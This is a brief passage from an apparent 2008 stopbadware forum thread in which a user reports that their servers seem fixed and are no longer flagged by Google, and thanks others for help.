instead of Linux. Fingers crossed.

Flattery

unread,
Jan 17, 2008, 4:14:27 AM1/17/08
to stopbadware
My servers seems to be fixed... Google isn't flagging it anymore.
Thanks for all the help.
Reply all
Reply to author
Forward
0 new messages